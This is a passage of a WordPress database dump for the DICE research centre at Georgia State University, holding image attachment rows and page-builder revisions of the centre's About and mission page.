15:23:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/disaster.jpg',0,'attachment','image/jpeg',0),(983,1,'2022-04-14 11:23:19','2022-04-14 15:23:19','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster-scaled-1.jpg','cropped-disaster-scaled-1.jpg','','inherit','open','closed','','cropped-disaster-scaled-1-jpg','','','2022-04-14 11:23:19','2022-04-14 15:23:19','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster-scaled-1.jpg',0,'attachment','image/jpeg',0),(985,1,'2022-04-14 11:23:25','2022-04-14 15:23:25','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c9\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-14 11:23:25','2022-04-14 15:23:25','',353,'https://gsudice.dataconn.net/?p=985',0,'revision','',0),(986,1,'2022-04-14 11:23:25','2022-04-14 15:23:25','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-324 style-local-122-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c12\">\n <!---->\n <!---->\n <h4 class=\"\">Our Mission</h4>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c13 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c14-outer\">\n <div data-colibri-id=\"122-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c15\" class=\"h-text h-text-component style-319 style-local-122-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c20\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-14 11:23:25','2022-04-14 15:23:25','',122,'https://gsudice.dataconn.net/?p=986',0,'revision','',0),(1006,1,'2022-04-14 11:57:50','2022-04-14 15:57:50','','sathwik 2','','inherit','open','closed','','sathwik-2','','','2022-04-14 11:57:50','2022-04-14 15:57:50','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/sathwik-2.jpg',0,'attachment','image/jpeg',0),(1007,1,'2022-04-14 11:58:03','2022-04-14 15:58:03','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg','cropped-sathwik-2-scaled-1.jpg','','inherit','open','closed','','cropped-sathwik-2-scaled-1-jpg','','','2022-04-14 11:58:03','2022-04-14 15:58:03','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg',0,'attachment','image/jpeg',0),(1021,1,'2022-04-14 12:05:06','2022-04-14 16:05:06','','sara','','inherit','open','closed','','sara','','','2022-04-14 12:05:06','2022-04-14 16:05:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/sara.jpg',0,'attachment','image/jpeg',0),(1022,1,'2022-04-14 12:05:11','2022-04-14 16:05:11','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sara.jpg','cropped-sara.jpg','','inherit','open','closed','','cropped-sara-jpg','','','2022-04-14 12:05:11','2022-04-14 16:05:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sara.jpg',0,'attachment','image/jpeg',0),(1049,1,'2022-04-14 13:52:20','2022-04-14 17:52:20','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Ryan.jpg','cropped-Ryan.jpg','','inherit','open','closed','','cropped-ryan-jpg','','','2022-04-14 13:53:21','2022-04-14 17:53:21','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Ryan.jpg',0,'attachment','image/jpeg',0),(1050,1,'2022-04-14 13:55:51','2022-04-14 17:55:51','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg','cropped-cropped-Ryan-e1649958770354.jpg','','inherit','open','closed','','cropped-cropped-ryan-e1649958770354-jpg','','','2022-04-14 13:55:51','2022-04-14 17:55:51','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg',0,'attachment','image/jpeg',0),(1093,1,'2022-04-14 16:22:32','2022-04-14 20:22:32','','Jean','','inherit','open','closed','','jean','','','2022-04-14 16:22:32','2022-04-14 20:22:32','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/Jean.jpg',0,'attachment','image/jpeg',0),(1094,1,'2022-04-14 16:23:12','2022-04-14 20:23:12','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg','cropped-Jean.jpg','','inherit','open','closed','','cropped-jean-jpg','','','2022-04-14 16:23:12','2022-04-14 20:23:12','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg',0,'attachment','image/jpeg',0),(1137,1,'2022-04-15 11:03:22','2022-04-15 15:03:22','','disaster1','','inherit','open','closed','','disaster1','','','2022-04-15 11:03:22','2022-04-15 15:03:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/disaster1.jpg',0,'attachment','image/jpeg',0),(1138,1,'2022-04-15 11:03:37','2022-04-15 15:03:37','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster1-scaled-1.jpg','cropped-disaster1-scaled-1.jpg','','inherit','open','closed','','cropped-disaster1-scaled-1-jpg','','','2022-04-15 11:03:37','2022-04-15 15:03:37','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster1-scaled-1.jpg',0,'attachment','image/jpeg',0),(1139,1,'2022-04-15 11:03:42','2022-04-15 15:03:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c9\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-15 11:03:42','2022-04-15 15:03:42','',353,'https://gsudice.dataconn.net/?p=1139',0,'revision','',0),(1140,1,'2022-04-15 11:03:42','2022-04-15 15:03:42','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c5\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c6\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n partners; and local communities. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c9 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c10 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c11-outer\">\n <div data-colibri-id=\"122-c11\" 